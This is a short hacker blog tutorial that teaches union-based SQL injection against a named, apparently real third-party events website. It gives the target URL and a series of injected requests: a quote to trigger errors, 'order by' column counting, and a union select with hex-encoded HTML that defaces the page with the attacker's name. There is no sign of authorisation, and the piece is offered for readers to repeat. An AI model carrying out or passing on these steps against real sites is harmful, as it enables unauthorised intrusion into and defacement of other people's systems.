Welcome Back to n0bz.com today i gonna show you how to print your name on screen Sqli Injection some time we need to write your name on screen for show we injected this website any i hope you know about this :D so lets start :v
Requirements
HackBar
You need to Vulnerability website i have this one
http://www.renaissance2.eu/events/event-detail.php?id=390619353
1. we need to check this its vuln or not for checking we need to put ' in the url end like this
http://www.renaissance2.eu/events/event-detail.php?id=390619353'
if you got any sqli error its mean this website is vuln we can inject this :)
oh i got sqli error this mean we can inject this but now topic is how to print your name on screen
2. now we need to find order number for this using this command order by 1--+- like this
http://www.renaissance2.eu/events/event-detail.php?id=390619353 order by 1--+- (no error)
http://www.renaissance2.eu/events/event-detail.php?id=390619353 order by 2--+- (no error)
http://www.renaissance2.eu/events/event-detail.php?id=390619353 order by 15 (error) its mean it have 14 orders
3. now replace order and go to UNION BASED and select UNION STATEMENT and enter order number
4. table number is 3
5. replace 3 number and write some html code like this
<font color="red" size="10"> Injected By n0Bz </font> copy this code and replace n0bz to your name and put it
6. select all html code and go to => Encoding => HexEncoding => String to 00f00 first option
7. when you convert html code in to hexEncoding then put 0x before html code
8. Click Execute then your name is printed :)
Watch Video
Sign up here with your email